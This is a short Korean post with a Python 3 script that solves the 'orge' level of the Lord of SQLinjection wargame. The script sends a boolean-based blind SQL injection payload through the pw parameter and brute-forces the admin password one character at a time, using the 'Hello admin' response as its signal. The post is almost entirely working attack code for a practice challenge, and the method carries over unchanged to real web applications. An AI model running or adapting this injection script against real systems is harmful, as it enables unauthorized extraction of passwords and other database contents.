Lord of SQLinjection - orge 파이썬3 자동화 도구

https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php

https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php

 

import requests

parameter = None



cookie = {'PHPSESSID':'여기다 자신의 쿠키 값을 넣음'}

result = None

solve = ""
	
for i in range(1, 8+1):
	

	for ascii in range(48, 112+1):
		print(ascii)
		parameter = "?pw='|| id='admin'%26%26 ascii(substr(pw,{},1))={}%23".format(i, ascii)
		url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php" + parameter
		result = requests.get(url=url, cookies=cookie).text
		if "Hello admin" in result:
			print(i, ascii, chr(ascii))
			solve += chr(ascii)
			break
			
print( solve )

requests 모듈 필요.